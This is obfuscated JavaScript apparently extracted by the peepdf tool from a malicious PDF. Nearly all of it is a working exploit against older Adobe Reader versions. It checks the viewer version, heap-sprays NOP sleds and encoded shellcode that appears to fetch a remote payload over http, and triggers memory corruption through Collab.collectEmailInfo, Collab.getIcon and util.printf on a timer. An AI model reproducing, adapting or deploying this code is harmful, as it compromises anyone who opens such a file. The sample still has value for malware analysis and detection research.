// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343', '%u434', '3%u4343%', 'u0FEB%u3', '35B%u6', '6C9%u8', '0B9%u80', '01%uEF3', '3%uE24', '3%uEBF', 'A%uE80', '5%uFFEC%', 'uFFFF%u', '8B7F%', 'uDF4E%', 'uEFEF%u', '64EF%u', 'E3AF%u9', 'F64%u42F', '3%u9F', '64%u6E', 'E7%uEF', '03%uEFEB', '%u64EF', '%uB90', '3%u618', '7%uE1A1%', 'u0703%', 'uEF11%', 'uEFEF', '%uAA66', '%uB9EB%', 'u7787%', 'u6511%u', '07E1%', 'uEF1F', '%uEFE', 'F%uAA', '66%uB9', 'E7%uCA87', '%u105F%u', '072D%u', 'EF0D%uE', 'FEF%uAA', '66%uB9E', '3%u008', '7%u0F', '21%u078', 'F%uEF3', 'B%uEFEF%', 'uAA66%', 'uB9FF', '%u2E87%u', '0A96%u0', '757%uEF2', '9%uEFEF%', 'uAA66%uA', 'FFB%uD7', '6F%u9A2C', '%u661', '5%uF7AA', '%uE806%', 'uEFEE%uB', '1EF%u9', 'A66%u64', 'CB%uE', 'BAA%uEE', '85%u64B6', '%uF7BA', '%u07B9%', 'uEF64%u', 'EFEF%u87', 'BF%uF5', 'D9%u9', 'FC0%u', '7807%uEF', 'EF%u66', 'EF%uF3A', 'A%u2A', '64%u2F', '6C%u66BF', '%uCFAA%u', '1087%u', 'EFEF%', 'uBFEF%', 'uAA64%', 'u85FB', '%uB6E', 'D%uBA64', '%u07F7', '%uEF8E%', 'uEFEF%u', 'AAEC%u28', 'CF%uB3E', 'F%uC191%', 'u288A', '%uEBA', 'F%u8A97%', 'uEFEF%u', '9A10%u64', 'CF%uE', '3AA%uE', 'E85%u64', 'B6%uF7', 'BA%uAF', '07%uEFEF', '%u85EF%', 'uB7E8%uA', 'AEC%uDC', 'CB%uB', 'C34%u10B', 'C%uCF9A', '%uBCBF', '%uAA6', '4%u85F', '3%uB6EA%', 'uBA64%', 'u07F7%', 'uEFCC', '%uEFEF%u', 'EF85%u', '9A10%', 'u64CF%u', 'E7AA%uED', '85%u6', '4B6%uF', '7BA%u', 'FF07%uE', 'FEF%u', '85EF%u', '6410%u', 'FFAA%', 'uEE85%u', '64B6%uF7', 'BA%uE', 'F07%uE', 'FEF%uAEE', 'F%uBD', 'B4%u0', 'EEC%u', '0EEC%u0E', 'EC%u0EEC', '%u036C%', 'uB5EB%', 'u64BC%u', '0D35%u', 'BD18%', 'u0F10%u6', '4BA%u640', '3%uE792%', 'uB264%uB', '9E3%u9C', '64%u6', '4D3%uF1', '9B%uEC', '97%uB91', 'C%u99', '64%uECC', 'F%uDC1C', '%uA626', '%u42AE%', 'u2CEC%u', 'DCB9%u', 'E019%', 'uFF51%', 'u1DD5%', 'uE79B%u', '212E%', 'uECE2%uA', 'F1D%u', '1E04%u1', '1D4%u9AB', '1%uB50', 'A%u0464%', 'uB564', '%uECCB%u', '8932%uE3', '64%u64A', '4%uF3', 'B5%u3', '2EC%u', 'EB64%', 'uEC64%', 'uB12A%u', '2DB2%uEF', 'E7%u1B07', '%u1011', '%uBA10', '%uA3B', 'D%uA0A2%', 'uEFA1', '%u7468', '%u707', '4%u2F3A', '%u772F%u', '726F%u', '646C%u69', '77%u656', '4%u75', '2D%u6173', '%u632E', '%u6D6F', '%u772F', '%u626', '5%u6C', '61%u7A6', '9%u726', '5%u6C2', 'F%u6E', '61%u69', '64%u67', '6E%u65', '2F%u6', '578%u70', '2E%u7', '068%u783', 'F%u703D', '%u6664');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

